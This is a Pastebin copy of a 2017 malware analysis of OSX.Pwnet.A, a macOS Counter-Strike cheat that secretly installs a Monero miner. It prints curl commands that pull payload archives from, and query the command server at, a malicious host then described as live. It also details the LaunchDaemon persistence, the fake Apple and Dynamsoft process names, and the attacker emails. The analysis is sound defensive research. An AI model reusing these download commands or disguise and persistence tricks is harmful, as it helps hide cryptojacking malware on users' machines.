API tools faq
paste
Advertisement
Guest User

OSX.Pwnet.A

a guest
Aug 24th, 2017
1,584
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.41 KB | None | 0 0
raw download clone embed print report
  1. OSX.Pwnet.A – CS: GO Hack and Sneaky Miner
  2. By Arnaud Abbati - August 23, 2017
  3.  
  4. (Photo source: Pony Strike: Global Offense by FilipinoNinja95)
  5.  
  6. We recently found a hack for Counter-Strike: Global Offensive on macOS that is also a trojan that could mine CryptoCurrencies without user consent.
  7.  
  8. According to VirusTotal Retrohunt, the threat is in the wild since the beginning of July 2017.
  9.  
  10. Warning: At the time of this writing, all URLs are live.
  11.  
  12. vlone.cc
  13. The entry point is vlone.cc portal, where a user can Register, Login and Download for free the hack installer.
  14.  
  15. The domain name was registered through eNom in April 2017, 14th, and resolves to a shared web host at namecheap:
  16.  
  17. $ dig vlone.cc +short
  18. 198.54.115.80
  19. $ dig -x 198.54.115.80 +short
  20. server205-2.web-hosting.com.
  21. HTTPS certificate was delivered by COMODO PositiveSSL in June 2017, 27th.
  22.  
  23. When logged in, members can browse the Prices page and purchase a premium subscription for 1, 3 or 6 months through Selly:
  24.  
  25.  
  26.  
  27. Members download the same archive of the free installer than guests:
  28.  
  29. $ curl -s https://vlone.cc/portal/download.php | shasum -a 256
  30. b1bdb4502f5051309582f72a62c14d9919d3c86de3dcfa0b3a5f008cb5a018fe -
  31. $ curl -s https://vlone.cc/portal/download.php -G -d user=1234 -d free | shasum -a 256
  32. b1bdb4502f5051309582f72a62c14d9919d3c86de3dcfa0b3a5f008cb5a018fe -
  33. According to the user GET query value, members count in August 2017, 22nd, is nearly two thousand.
  34.  
  35. We don’t know if the private installer of the hack also installs the mining software without user consent.
  36.  
  37.  
  38.  
  39.  
  40.  
  41. Binaries analysis
  42. It’s all C++ Standard Library code. Network connections use libcurl and secure HTTPS protocol.
  43.  
  44. All executables, but the miner CLI, require super-user privileges, so the user must run the installer with sudo:
  45.  
  46. $ ./vHook
  47. Root access required!
  48. Please type "sudo ./vhook"
  49. The main binary hides itself as Dynamic Web TWAIN, an online document scanning platform.
  50.  
  51.  
  52.  
  53. vHook
  54.  
  55. vHook is the installer. It is packed with UPX, probably to avoid user analysis and bypass some security products.
  56.  
  57. It is a command line interface:
  58.  
  59. $ sudo ./vHook
  60. [vlone] vHook public [vlone]
  61. Username: USERNAME
  62. Password: PASSWORD
  63. [vlone] Welcome to vHook Public, USERNAME!
  64. [vlone] Downloading vHook assets..
  65. [vlone] Inflating vHook assets..
  66. [vlone] CS:GO is not running!
  67. [vlone] Cleaning up..
  68. [vlone] Quitting...
  69. With a valid member account, it downloads and extracts bootstrap.dylib and vhook.dylib from https://vlone.cc/portal/gateway.php as assets.zip to /Library/Application Support/:
  70.  
  71. $ curl -s https://vlone.cc/portal/gateway.php -G -d username=USERNAME -d password=PASSWORD -d free | xxd -l 64
  72. 00000000: 504b 0304 1400 0000 0800 8696 c14a 9c2e PK...........J..
  73. 00000010: 55c2 b606 0000 1827 0000 0f00 1c00 626f U......'......bo
  74. 00000020: 6f74 7374 7261 702e 6479 6c69 6255 5409 otstrap.dylibUT.
  75. 00000030: 0003 9cb9 2f59 d339 8059 7578 0b00 0104 ..../Y.9.Yux....
  76. It loads bootstrap.dylib from osxinj project. If Counter-Strike: Global Offensive is running, it downloads and extracts some fonts (https://vlone.cc/fontfix.zip as vlone.zip to /Library/Fonts/), and injects vhook.dylib into csgo_osx64 process.
  77.  
  78. It could be a perfect deal for a CS: GO user, but it turns out vHook also sneaky downloads and extracts https://vlone.cc/abc/assets/asset.zip as fonts.zip to /var/, changes directory to /var and runs sudo ./helper &.
  79.  
  80. It then kills Terminal application to hide the detached process output.
  81.  
  82.  
  83.  
  84. helper
  85.  
  86. helper is the miner downloader dropper. It is also packed with UPX.
  87.  
  88. It first asks the C&C server for the name of the binary to execute upon download:
  89.  
  90. $ curl https://www.vlone.cc/abc/commands/update.php?request -F command=newfile
  91. com.dynamsoft.webhelper
  92. It downloads https://www.vlone.cc/abc/assets/b.zip as /b.zip, extracts its contents to /var/.log/, changes directory to /var/.log/ and runs sudo ./com.dynamsoft.WebHelper &.
  93.  
  94. At the time of this writing, https://www.vlone.cc/abc/assets/b.zip URL response is a File Not Found 404 error code, but https://www.vlone.cc/abc/assets/bz.zip URL is live and send the expected archive.
  95.  
  96.  
  97.  
  98. com.dynamsoft.WebHelper
  99.  
  100. com.dynamsoft.WebHelper is the miner downloader. Despite the name, it is not related to Dynamsoft.
  101.  
  102. It starts by downloading and extracting:
  103.  
  104. WebTwainService from https://www.vlone.cc/abc/assets/d.zip to /var/.log/
  105. com.dynamsoft.WebTwainService.plist from https://www.vlone.cc/abc/assets/p.zip to /Library/LaunchDaemons/
  106. It loads the daemon, sends computer unique identifier (UUID) and its version to C&C server, and checks if it meetsRequirements(), i.e. running as root and not in a debugger:
  107.  
  108. $ curl -s https://www.vlone.cc/abc/hub.php?init -F version=1.2.1 -F hwid=$(uuidgen)
  109. created continue
  110. It then sleeps for one hour. If one is in a hurry, he or she can cut out the nap easily:
  111.  
  112. __text:0000000100016A5F BF 01 00 00 00 mov edi, 1800 ; unsigned int
  113. __text:0000000100016A64 E8 5B 72 00 00 call _sleep
  114. Once rested, it sends commands to C&C server every minute to ask if it should mine and update or kill itself:
  115.  
  116. $ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F command=mine
  117. true
  118. $ curl -s https://www.vlone.cc/abc/commands/update.php?request -F command=update
  119. false
  120. $ curl -s https://www.vlone.cc/abc/commands/kill.php?request -F command=kill
  121. false
  122. Every minute, it also creates or updates the mining thread to:
  123.  
  124. download and extract https://www.vlone.cc/abc/assets/helper.zip to /var/.trash/.assets/
  125. get miner settings (maximum core number, currency, email address)
  126. check if Activity Monitor is running
  127. check if it is already mining
  128. check if it should stop mining
  129. run cd /var/.trash/.assets/; ./com.apple.SafariHelper with appropriate arguments
  130.  
  131.  
  132. WebTwainService
  133.  
  134. WebTwainService tries to take care of com.dynamsoft.webhelper persistency. It is again packed with UPX.
  135.  
  136. It sets its current directory to /var/.log and runs sudo ./com.dynamsoft.webhelper &, then recursively sleeps for one hour…
  137.  
  138.  
  139.  
  140. minergate-cli
  141.  
  142. com.apple.SafariHelper actually is the official MinerGate CLI v4.04:
  143.  
  144. $ shasum -a 256 MinerGate-cli-4.04-Mac/minergate-cli com.apple.SafariHelper
  145. b943369a2ae7afb3522f3b1c40c15208bff0444d47d0df476dd585cf9cbf7c10 MinerGate-cli-4.04-Mac/minergate-cli
  146. b943369a2ae7afb3522f3b1c40c15208bff0444d47d0df476dd585cf9cbf7c10 com.apple.SafariHelper
  147. It is written in Qt, so it comes with frameworks:
  148.  
  149. $ find /private/.trash -type f
  150. /private/.trash/.assets/com.apple.SafariHelper
  151. /private/.trash/.assets/Frameworks/QtCore.framework/Versions/5/QtCore
  152. /private/.trash/.assets/Frameworks/QtNetwork.framework/Versions/5/QtNetwork
  153. /private/.trash/.assets/Frameworks/QtSql.framework/Versions/5/QtSql
  154. /private/.trash/.assets/Frameworks/QtWebSockets.framework/Versions/5/QtWebSockets
  155. It takes as CPU as requested by com.dynamsoft.WebHelper so the user enjoys the delight of computer’s fans background music:
  156.  
  157. $ ps axu | grep [c]om.apple.SafariHelper
  158. root 474 200.0 0.2 2490592 14204 s000 R+ 3:07AM 3:21.87 ./com.apple.SafariHelper -user pwnedboi@protonmail.com --xmr 2
  159. It this example, it is mining Monero (XMR) with all virtual machine cores (two: 200.0%).
  160.  
  161. Current MinerGate email address is pwnedboi@protonmail.com, and xxanax420@gmail.com email address was also found hardcoded in another sample.
  162.  
  163. Maximum core number, CryptoCurrency and email address are provided by com.dynamsoft.WebHelper and the C&C server:
  164.  
  165. $ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F mine=cores
  166. 4
  167. $ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F mine=coin
  168. xmr
  169. $ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F mine=email
  170. pwnedboi@protonmail.com
  171.  
  172.  
  173. Finn and ponies
  174. We didn’t spend too much time reverse engineering vhook.dylib. The source code is available on GitHub and videos of the hack are also available on YouTube here and there.
  175.  
  176. GitHub owner of the vHook project is fetusfinn (original author is ViKiNG) and we coincidentally found debugger symbols matching Finn username in GitHub’s libvHook.dylib and in all analyzed binaries:
  177.  
  178. $ for f in github.com/fetusfinn/vHook/libvHook.dylib \
  179. vHook_unpacked helper_unpacked com.dynamsoft.WebHelper WebTwainService_unpacked
  180. do
  181. nm -a "$f" | grep -m 1 Finn
  182. done
  183. 0000000000000000 - 00 0000 SO /Users/Finn/Desktop/c++/vHook/
  184. 0000000000000000 - 00 0000 SO /Users/Finn/Downloads/Archive/vloneLoader/
  185. 0000000000000000 - 00 0000 SO /Users/Finn/Desktop/pwnednet/pwnednet/installer/installer/
  186. 0000000000000000 - 00 0000 SO /Users/Finn/Desktop/pwnednet/pwnednet/pwnednet/
  187. 0000000000000000 - 00 0000 SO /Users/Finn/Downloads/WebTwainService/WebTwainService/WebTwainService/
  188. This is how we know Finn’s project name is pwnednet. Shortened to pwnet, it sounds like poney in French, i.e. pony in English and, everybody loves ponies, so here you have OSX.Pwnet.A!
  189.  
  190. There also is a reference to someone named Jennifer Johansson in Xcode user data:
  191.  
  192. $ find github.com/fetusfinn/vHook -type f -path "*nnif*"
  193. github.com/fetusfinn/vHook/vHook.xcodeproj/xcuserdata/jenniferjohansson.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist
  194. github.com/fetusfinn/vHook/vHook.xcodeproj/xcuserdata/jenniferjohansson.xcuserdatad/xcschemes/vHook.xcscheme
  195. github.com/fetusfinn/vHook/vHook.xcodeproj/xcuserdata/jenniferjohansson.xcuserdatad/xcschemes/xcschememanagement.plist
  196. We didn’t take the time to ask pwned’s boyfriend on Discord if Finn is much into ponies:
  197.  
  198.  
  199.  
  200. But, just in case, here is a Dutch Pony for Finn and her team.
  201.  
  202. From Hackestria with ❤️
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!